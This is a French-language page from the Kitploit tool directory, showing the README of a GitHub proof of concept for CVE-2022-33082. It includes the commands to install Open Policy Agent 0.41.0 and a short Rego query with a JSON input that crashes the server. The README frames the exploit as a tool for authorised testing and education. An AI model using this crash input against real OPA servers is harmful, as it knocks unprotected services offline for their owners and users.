Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/cyberqueenmeg/cve-2022-33082-exploit
Analyse des VulnérabilitésExploitationSécurité WebApprentissage et Éducation
GitHubcyberqueenmeg/cve-2022-33082-exploit

cve-2022-33082-exploit

Preuve de concept pour CVE-2022-33082 provoquant un déni de service dans Open Policy Agent versions ≤0.41.0 via une entrée malveillante. Destiné aux tests autorisés et à un usage éducatif.

Voir le dépôt
11il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit CVE 2022-33082

AVERTISSEMENT

Ce code est fourni à des fins ÉTHIQUES - comprendre la vulnérabilité et tester ses propres systèmes ou des systèmes AUTORISÉS. En l'utilisant, vous acceptez d'agir de manière éthique et je décline toute responsabilité si vous n'agissez pas de manière éthique.

Cet exploit fonctionne sur les versions 0.41.0 et inférieures d'Open Policy Agent (OPA). Installez une instance OPA sur Linux pour tester avec cette commande :

curl -L -o opa https://openpolicyagent.org/downloads/v0.41.0/opa_linux_amd64_static

chmod +x opa

./opa run --server

Ensuite, accédez à localhost:8181 dans votre navigateur web. Saisissez ce qui suit dans les champs respectifs

champ de requête (code Go) : p := [input() | input := 1]

{ "input":"put this in the input (json) field!" }

Le site web plantera alors et le terminal exécutant le serveur signalera une panique du noyau

Implications

Toute personne ayant un accès web à un serveur OPA version 0.41.0 ou inférieure peut faire planter complètement le serveur. Ce serveur n'est pas protégé par mot de passe par défaut.

Télécharger l’outil